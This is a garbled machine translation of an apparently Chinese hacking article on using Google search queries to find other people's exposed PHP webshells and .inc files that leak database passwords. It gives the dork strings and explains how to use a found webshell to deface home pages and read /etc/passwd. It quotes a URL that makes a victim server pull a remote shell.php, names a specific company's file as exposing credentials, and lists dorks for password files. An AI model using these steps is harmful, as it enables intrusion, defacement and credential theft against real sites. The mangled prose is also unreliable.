Google, you are so good
Article Source: PHACK Source: www.phack.orgogleHacking is a host of the vulnerability and information containing sensitive data using Google's search engine and information containing sensitive data. The virus comes from the dock. In order to cause everyone to pay attention to GoogleHacking, we have made this article hopes that you can better protect your information security through your understanding of HACK's attack. In this paper, it is important in the understanding of GoogleHacking attack methods, and for details of the details of some attacks are not detailed. Foreword: At the Blackhat conference held in Las Vegas, two security experts have been named you Found That on Google and Google Attacks. After the security focus forum original master WLJ big brother, the individual feels that it is necessary to supplement some detail parts. Today, I'm telling you another feature: using search engines quickly finds hosts with vulnerability and information that contains sensitive data, and even direct fool invasion. Use Google to perform the "penetration test", we often conduct information collection before implementing the attack, and then the vulnerability confirmation and the ultimate vulnerability utilization, expand the results. Here we are here to talk about: First, use Google to find the host of the PHP Webshell back door, and test whether it can be used; Second, use Google to find exposed Inc sensitive information. OK, now we start: 1. Find out with php Webshell we fill in in Google's search box: INTITLE: "PHP shell *" "Enable stderr" FileType: PHP (Note: intitle-web header Enable Stderr-UNIX standard output and standard error) FileType- file type ). In the search results, you can find a lot of Web Shell directly on the machine to execute the command. If the PHPSHELL found will not be used, if you are not familiar with UNIX, you can look at the list directly, here is not detailed, there are a lot of use value. To explain, we can search for some foreign phpshells here to use the UNIX commands, all of which are SYSTEM calls (it can be used in Baidu and other search engines, just fill in the search for the search). Through my test, this phpwebshell is a direct Echo (UNIX common command). In a word: echo "Summon"> index.jsp Write on the echo / after you: "Summon" now look at the homepage, have been changed: "Summon", we can also use Wget to upload A file (such as the leaves you want to replace). Then Execute Command Enter Cat File> Index.html or Echo ""> File Echo "Test" >> File This article is called, the site's home page is replaced.
The same can also be uname -a; CAT / etc / passwd but pay attention to, some Webshell programs have problems, such as: http://www.al3toof.com/card/smal ... c_html & command = http: //ramsgaard.net/upload/shell.php PHP's PHP is a Global Register Off solution: We can use related tools to search on the Internet, if information is abused, to http://www.google.com/ Remove.html Submit the information you want to delete, control the search engine robot's query. 2. Search INC sensitive information We are filled in the Google's search box: .org filety: INC We now search the ORG domain site INC information (Because Google Shielded Search "COM" information, we can also search other GOV, CN, INFO, TW, JP, EDU, etc.) PS: I am watching many PHP programmers, I like to put it. Some commonly written code or configuration information, written in a .inc file, such as shared.inc, global.inc, conn.inc, etc., of course, this is a good habit, including the PHP official website, But I don't know if you have noticed that there is a safety hazard problem. When I wrote a PHP code, I accidentally wrote a wrong sentence. When I viewed this PHP file in the browser, I found out that the screen was discovered in detail showing the PHP file path and code row. (PHP error display configuration is open. This feature is default in PHP!), This means that when we don't want to write wrong code (same .inc file is also the same) or PHP error display It is also open, the client's users will see the .inc files of the specific URL address, and the .url file is like TXT text, when browsing in the browser, there is no need to display its content without retaining, and Many sites have written important information such as user passwords in .inc files! Including domestic Haier and Jia Bell Motorcycle, I dare to announce because I have tested, http://www.haier.com / su *** / inc / conn.inc fettered database ID password can not be connected to the client, the website is closed 1215, and the firewall is also filtered. Ok, after INC's knowledge, we will continue to search, find a way to expose the mysql password, and use the client to log in to modify the data. Here, the knowledge of the database, we don't talk too much, about " INC Exposure Sensitive Information "After you end here, certain ways we can solve it by some ways: 1. You can configure the .inc file to avoid the source file directly. 2. Of course, the better method is to add and change the file extension. PHP (PHP can be resolved) so that the client will not obtain the source file.
Here, I will expressed the picture drawn by FreeMind. For more information on Google Hack, help us analyze step connectors: -:. * | Operator: "foo1 foo2" filetype: 123 site: foo.com intexT: foo intitle: footitle allinurl: foo passwords: "index of" htpasswd / passwd filetype: xls username password email "ws_ftp.log" "config.php" allinurl: admin mdb service filetype: pwd (frontpage) sensitive information: "robots. tx "" disallow: "filetype: txt inurl: _vti_cnf (frontpage files) allinurl: /msadc/samples/selector/showcode.aspallinurl: /examples/jsp/snp/snoop.jspallinurl: phpsysinfoipsec filetype: confintitle:" error occurred "odbc Request where (select | insert) "Mydomain.com" Report Generated BY "end: If you want to take root permissions, you have to analyze the specific questions, but there is a shell permission is good, there are many webshell improvements. The article can be referred to the article. We can also search for many useful things through Google, but the details are slowly analyzed, expanded, expanded, and invading. These I don't specifically analyze. Give everyone a thinking, Everyone slowly studied it here. This article is to end. The purpose of writing this article is to lead to everyone's attention and attention, understand the new HACK means, understand new protection methods, things have two sides, in Today's Google's prevailing, while making full use of Google. It should also be more comprehensive.
